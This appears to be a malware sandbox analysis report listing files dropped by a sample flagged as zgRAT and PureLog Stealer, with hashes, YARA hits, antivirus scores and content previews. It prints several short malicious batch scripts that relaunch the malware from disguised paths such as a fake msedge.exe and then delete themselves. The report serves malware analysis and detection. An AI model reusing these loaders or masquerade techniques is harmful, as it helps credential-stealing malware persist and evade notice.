                                                                                                                                                                        Preview:1U0OxE89EptfheBp4e7ivW4E2tKm9jmzKI97sGt8cSPd5u3SFQOEifHfavVD3W9eC3UYeD7xu9GdHaJIz1htViQoAeh6uqEFSubBaeyBTaTjZoX9mNNCyQIempX9gBCE4AKW9HrUDfZ5OqPWGhThcCRCm7ZuHyeSXPpYeBAff28S0MP5ZB29rfm2tItCr7NPBHi9B11FgxBjD8LZrdUF5fk1nwoWS8xiptRtoQ3iKxc3eCzu6UUOnITggqWPNewi9d4Trcubjw5HCqXk63a7nj4havM83oUpA33AIfDej3p0MLdzTvSTEz5aiX36Pwh5bQHJwWcb05Yu4DUORWoIVBkL7dculGOxVuZ6ETD6S1cJaLgeDoo2HZjZp5LT4szurlYKoXK8Tszeibvw67r7cVp6K9QIItCkBsbzxW0pdqjZjE1OKZX7A2RV5c9oHBzkqOc0958jHCdvwQWFIB8tWEkJaG3VXLic09tUmAPOax08YfipF3gFDGOloSZ2BnM5dB5xgBdHwtSiOmv5hNPdocYuvHqUlXMwl4eXkvIDaYTTypWCheUyXsQAmLCZVJgZgf6UHXUwEMDQJF5FvowHCYY3ndvZstsR24wStC4JJhtLpA1gP7orWYWHGDqom5DUdvXPTnWstn7epNNmmOKvFB5ehoLpVQgOeYr3nlNll57ta2c3zDCYuSPc03rpbqWcGtARfU9ABiKKDLDpMSzSOIdMJPCu4iK4ifmr1KYfEBWMHFZozCcJ1EO8QyIQRPGdYQlijWxB4TOMvQEDzY41FADeQoaDCIOz53x1d1FdObPh0BM9tEa3UOYXMGR55t9wFYR1cNk8SbnnvfoPbbU7rVeqfaoXjKhebcbbuUggebk2lumrcCdeZCEu3kWC
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1963008
                                                                                                                                                                        Entropy (8bit):7.552676792704024
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                        MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                        SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                        SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                        Entropy (8bit):5.370675888495854
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                                                                                                                                        MD5:5ACBB013936118762389287938AE0885
                                                                                                                                                                        SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                                                                                                                                        SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                                                                                                                                        SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1396
                                                                                                                                                                        Entropy (8bit):5.350961817021757
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                                        MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                                        SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                                        SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                                        SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                        Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                                                                                                        MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                                                                                                        SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                                                                                                        SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                                                                                                        SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@...e................................. ..............@..........
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):150
                                                                                                                                                                        Entropy (8bit):5.097765085776852
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mF5XIvBktKcKZG10nacwRE2J5xAIunNyMH:hCRLuVFOOr+DE74vKOZG1cNwi23fMNZH
                                                                                                                                                                        MD5:3AE6B652E61E50FCC65BC785686E2589
                                                                                                                                                                        SHA1:CE996CC29ECA02194D4E947D077BAEAEA2CB3C38
                                                                                                                                                                        SHA-256:81541C09E086A112B2BBBEDA30A92C1834A01BCCF6437A33AE8DD6008F8502B3
                                                                                                                                                                        SHA-512:7CAFB3462469482D46BABBC6FC83AFC6C558094977EDFF6D75CC23D1FFDAC8AAE6CD1CF859E6B9EDCA60501ACC4A6952EE452E5C27D1945D0980A0A238234F64
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Cb8ciTnPhW.bat"
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.403856189774724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:yEm8+Ue7:y78i7
                                                                                                                                                                        MD5:1ACD0061BEA6E2BEE885ACEE1C74EFC3
                                                                                                                                                                        SHA1:E594B98F4D8F7BE8FC660455230D9E37A4E74EB0
                                                                                                                                                                        SHA-256:FC9217C83542259083A3C46116257315E931735A5C3566606062FAFCE707ECEF
                                                                                                                                                                        SHA-512:1EB3FF6C41A783275DE7730D13E9D7F3DE8A309B48F9D862E792B4ED515A52B2A1D75E663D499A070A7300E4ABEB5592E4D2741542B28E71925DFD3334051E2A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:G4xcQumFux75gqCEZYrhJ8d8R
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.483856189774723
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:0je+yag1:8Xw
                                                                                                                                                                        MD5:F3E6F8EB5C2B3C9F8D5902181CF2D87B
                                                                                                                                                                        SHA1:B9B661A5932A34AEAE194A3580C28E48B0E9D7C6
                                                                                                                                                                        SHA-256:175DD9BFADB55EF0F8FBFD9B9C771CC2D4060D19496C59B22A48CB319A3C9A6F
                                                                                                                                                                        SHA-512:0F099427B6EBB711004978EC4FA39414BE7D221E2A0C39D4A70BDEB1CC809E7B2F5139286E821554CAB9973524D7CE4F136F094F8BD86BE1BF1E1B1025F3B192
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:GtB0nVk1TxtwCKNcLWuZDXg0z
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):239
                                                                                                                                                                        Entropy (8bit):5.247312636792359
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:hCijTg3Nou1SV+DE1cNwi23JA2ELvSmvKOZG1cNwi23fd1sH:HTg9uYDEVZ9EWZjm
                                                                                                                                                                        MD5:7979389FC8559212B88F8EEF3EE75E4A
                                                                                                                                                                        SHA1:AA1FB9265A05CA93524089A5C7526EEC49E3A58D
                                                                                                                                                                        SHA-256:08B22DB010A3E4DB6A749E4B9742C94A34735BBF59E5DFC00075E491364C4898
                                                                                                                                                                        SHA-512:40C3D69D499113D5E68B0E55B242856794C95F1C45BFE4D8976F56371EC2CDA008F2D48B2E8670C8CF94B7528157A61FD696DC38AEB22B0618A7B7A2E8183FAB
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\NnkzcdwAFb.bat"
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c4, 10 symbols, created Mon Sep 30 19:32:39 2024, 1st section name ".debug$S"
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):1916
                                                                                                                                                                        Entropy (8bit):4.601630597970278
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:H8e9s0aLzctOxnZHyYwK80N6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+qcN:LaLzcanZKK80klmuulB+hnqXSfbNtmhP
                                                                                                                                                                        MD5:FB9028984FA031CF88E6B2CF66A4649D
                                                                                                                                                                        SHA1:970EEDFBFC11FAB51FA6DE66CE21A2356DBFA2E4
                                                                                                                                                                        SHA-256:DCDFCCCD1DEEB4773FC33BE1ECED0C85CE3B36E76BAB28944F662EAE91490397
                                                                                                                                                                        SHA-512:843286D0FD13C74EF55A5E0AEB91020FA4E95F68A2BB5CBC4999DCFC6D919838F72E0992DF78B1F1EA5836025EA4A89CCEE988D14D95343D914D887BD03918BD
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:L......f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP.....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6dc, 10 symbols, created Mon Sep 30 19:32:39 2024, 1st section name ".debug$S"
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):1940
                                                                                                                                                                        Entropy (8bit):4.557717932254492
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:H0PW9WXOaIXsZHHwK80NyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+AlUZ:aQYZwK80MluOulajfqXSfbNtmhFZ
                                                                                                                                                                        MD5:0CFCF137D9968550EDC5A6C210CFE825
                                                                                                                                                                        SHA1:28634397A0D7ED81E4AE2924B2DBB30FDFB123A7
                                                                                                                                                                        SHA-256:53B038A07A2E36D9A3084039E2F1253CD5956528D953920611B4DCA03D7BB874
                                                                                                                                                                        SHA-512:525A47D6383475BE6E55481487D7F5996740A85B399253C64316B1A42987F09DC11BFF5273A2E1489499574F78A116ED6FAB737B6DB007E7823D0A7E67A14C78
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:L......f.............debug$S........,...................@..B.rsrc$01................X...........@..@.rsrc$02........p...l...............@..@........<....c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):198
                                                                                                                                                                        Entropy (8bit):5.091505143963069
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:hCijTg3Nou1SV+DE74vKOZG1cNwi23fiPj4H:HTg9uYDE3ZaP2
                                                                                                                                                                        MD5:F29C75FF9E71808FBCA6A7F9CB552252
                                                                                                                                                                        SHA1:AB0DDB2FB630282F025C74BD1ED1684CF0B79A1F
                                                                                                                                                                        SHA-256:BB3FA09E221FF3549E039CBCA206FBE33777D4716A5C986AA56C9BA472D01065
                                                                                                                                                                        SHA-512:62D1191960A268357EB79D283F52969C245E9D29684A8B4785EB8276D40A819406D15D6B2ACD1E31758D3FB31EC2D88E2EC1EFC48ACA2E8371339557F6D87932
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\W7vO5ocqvr.bat"
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.213660689688185
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:53MDHqEKn:paHqVn
                                                                                                                                                                        MD5:3975DC84D3405DB75E962D9548067AF7
                                                                                                                                                                        SHA1:3A5145CF968ECE957F34E297A29165EFA54C0401
                                                                                                                                                                        SHA-256:BA7C8FAE6E2DD88B0F1538718FA5517048282C9AB3B48F92A456632E3528D404
                                                                                                                                                                        SHA-512:346BB8570634A0797F497AA6F967F5EF042532A3572D8430D73AAC87BA7CF46D6CDAC8BAC55CBFA4224BC9F1D8567BF5025533AFE20E846A21F0C1B4C7D21645
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:a5RisVS2EKrc5E5oqBg6ahTS4
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
